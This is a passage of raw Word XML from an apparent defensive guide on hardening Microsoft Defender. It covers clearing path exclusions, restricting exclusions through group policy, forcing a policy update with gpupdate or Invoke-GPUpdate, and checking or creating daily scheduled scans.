      </w:r>
    </w:p>
    <w:p w14:paraId="6AEE9C52" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>The disabling of path exclusions,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will ensure that all modules that are detected to be malicious will not be able to be ignored within a real time scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEFDE50" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>When threat actors set a path exclusion, the path does not get scanned by the antivirus in real time protection. This means that the files will only be detected as malicious when a quick scan, full scan or custom scan is performed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33308BE3" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>To combat threat actors from being able to evade a real time scan, the path exclusion settings can be configured within the group policy and enforcing the changes to the devices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687361B9" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="steps-to-disable-path-exclusions"/>
      <w:r>
        <w:t>Steps to Disable Path Exclusions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D78E361" w14:textId="47578FF0" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00E402BF">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Navigate to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Windows Security &gt; Virus &amp; Threat Protection &gt; Virus &amp; Threat Protection Settings &gt; Manage Settings &gt; Exclusions &gt; Add or Remove Exclusions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B7CCAB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47ED1EFC" wp14:editId="6ECA8F5F">
            <wp:extent cx="5943600" cy="1685925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="194079127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9127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37A16" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>Windows Security Path Exclusion List</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DF8025" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4503B787" w14:textId="77777777" w:rsidR="003C110A" w:rsidRDefault="003C110A">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="314409B2" w14:textId="47B9FBF5" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00E402BF">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Verify that all possible malicious paths, folders and processes are removed from the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>list</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1A34CE0E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6BEB29F1" wp14:editId="37B4FB43">
            <wp:extent cx="5943600" cy="1609725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1598035292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8035292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Windows Security Cleared Path Exclusion List</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0136735A" w14:textId="77777777" w:rsidR="00504503" w:rsidRDefault="00504503" w:rsidP="00504503">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76D1A123" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00E402BF">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Search for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>gpedit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in the search bar and launch the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>application</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="631FA271" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:ind w:left="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FA7A417" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="351804CB" wp14:editId="757CB636">
            <wp:extent cx="5943600" cy="3276600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="121629217" name="Picture 12" descr="A computer screen with a blu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9217" name="Picture 12" descr="A computer screen with a blu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ED46E" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Searching for Group Policy Management Editor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7388B895" w14:textId="77777777" w:rsidR="000B0195" w:rsidRDefault="000B0195">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="04386425" w14:textId="5D5DD387" w:rsidR="00000391" w:rsidRPr="00407FE6" w:rsidRDefault="00000391" w:rsidP="00E402BF">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Using the Group Policy Management Editor go to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Computer </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>configuration</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="02668D60" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:ind w:left="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="334A5C9D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4C6726FC" wp14:editId="2C4F64A5">
            <wp:extent cx="5943600" cy="3095625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="109512289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122893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FCA7B" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Computer Configurations within Group Policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C979A31" w14:textId="5906FA82" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391"/>
    <w:p w14:paraId="4F03048B" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Expand the tree to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Windows components &gt; Microsoft Defender Antivirus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D231EC" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37D1F404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7CD4D246" wp14:editId="0B93BA73">
            <wp:extent cx="5467350" cy="2843373"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="471343101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343101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899" cy="2850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B09A9" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Microsoft Defender Antivirus Configurations within Group Policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFE4174" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5121EDA9" w14:textId="5041711C" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00E402BF">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Within the Microsoft Defender Antivirus, Locate and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Enable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the following rule - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Control </w:t>
      </w:r>
      <w:r w:rsidR="00E402BF">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>whether</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> exclusions are visible to Local Admins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA7432A" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34C862C6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3D647A5C" wp14:editId="52B6F82F">
            <wp:extent cx="3648075" cy="3390839"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1751451807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451807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2087" cy="3403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20878" w14:textId="799D1F3A" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Control whether exclusions are visible to Local Admins </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>rule</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="458BA275" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00E402BF">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Within Microsoft Defender Antivirus, Locate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Exclusions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E44B8E" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09335364" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="505BF7F8" wp14:editId="7344B736">
            <wp:extent cx="5943600" cy="3095625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1578618457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618457" name="Picture 1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2C27C" w14:textId="7BC538E5" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="009A6C8D">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Microsoft Defender Antivirus Exclusions Configurations within Group Policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7BC272" w14:textId="3E84B448" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Configure the following policies and </w:t>
      </w:r>
      <w:r w:rsidR="00E402BF">
        <w:t>enforce</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>them</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="49DF807B" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E50CC45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2E3595D1" wp14:editId="58C14EDD">
            <wp:extent cx="5819775" cy="1238250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="764721440" name="Picture 17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721440" name="Picture 17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947E3" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Configured Microsoft Defender Antivirus Exclusions Configurations within Group Policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B079A9F" w14:textId="5824AA11" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391"/>
    <w:p w14:paraId="3DC3805B" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enforce the newly configured policy by running the following command on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Command Prompt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>PowerShell (as Administrator)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101FFE8D" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Command Prompt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36751262" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>gpupdate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/force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444F050E" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AFB4942" wp14:editId="65361BB3">
            <wp:extent cx="4124325" cy="2072076"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="699235929" name="Picture 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235929" name="Picture 8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154" cy="2085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1C08E" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Forcing Group Policy Update Through Command Prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC4D296" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>PowerShell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCFBDE0" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>GPUp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Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB41E1A" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67D1A11B" wp14:editId="701E650B">
            <wp:extent cx="6082219" cy="781050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="880285373" name="Picture 7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0285373" name="Picture 7" descr="A black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872" cy="78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3C295" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Forcing Group Policy Update Through PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7CA0C6" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5781D731" w14:textId="77777777" w:rsidR="009A6C8D" w:rsidRDefault="009A6C8D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6130B32E" w14:textId="119D3834" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Verify that the policy has been enforced by navigating to Windows Defender and ensuring that you are unable to view and or modify the list for file </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>exclusions</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2456D13E" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31A5EFB9" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="591747D6" wp14:editId="6D2BCBDC">
            <wp:extent cx="5617025" cy="1638300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1244849752" name="Picture 18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849752" name="Picture 18" descr="A close up of a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3114" cy="1648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A4886" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Permision</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Denied for Windows Security Exclusions Page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F42BD47" w14:textId="77777777" w:rsidR="001753AC" w:rsidRDefault="001753AC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9" w:name="references"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9510D6" w14:textId="549BFCEC" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Conduct Scheduled Scans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B3C2C7" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">According to the Microsoft documentation, while folders, files and processors are within the exclusion list, the exclusion list </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>are</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> not used in scheduled scans. These scans </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>includes</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> quick </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>scan</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>, full scan or custom scans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66440862" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>As such by conducting regularly scheduled scans, any malicious files inserted within the system will be able to be identified quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B028B5D" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Steps to Conduct Scheduled Scans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA960FB" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00E402BF">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open Task Scheduler and navigate to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Task Scheduler Library &gt; Microsoft &gt; Windows &gt; Windows Defender</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFA29C3" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="472120F7" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00686F25">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AFDEC55" wp14:editId="4A603652">
            <wp:extent cx="5943600" cy="3088005"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="560443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443959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A78C6" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Task Scheduler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF823FE" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D897581" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6DB279" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00E402BF">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Check that there is a task scheduled to conduct a scan </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>daily</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5464B947" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3724B328" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6810BF87" wp14:editId="659092C7">
            <wp:extent cx="5334000" cy="2019629"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30" name="Picture" descr="Windows Defender Scheduled Sc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POC_1/Mitigation/Conduct_Scheduled_Scans/POC1_Windows_Defender_Scheduled_Sca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F9E19F" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Windows Defender Scheduled Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E514D4E" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00E402BF">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create a scheduled task if the task </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> not </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>exist</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
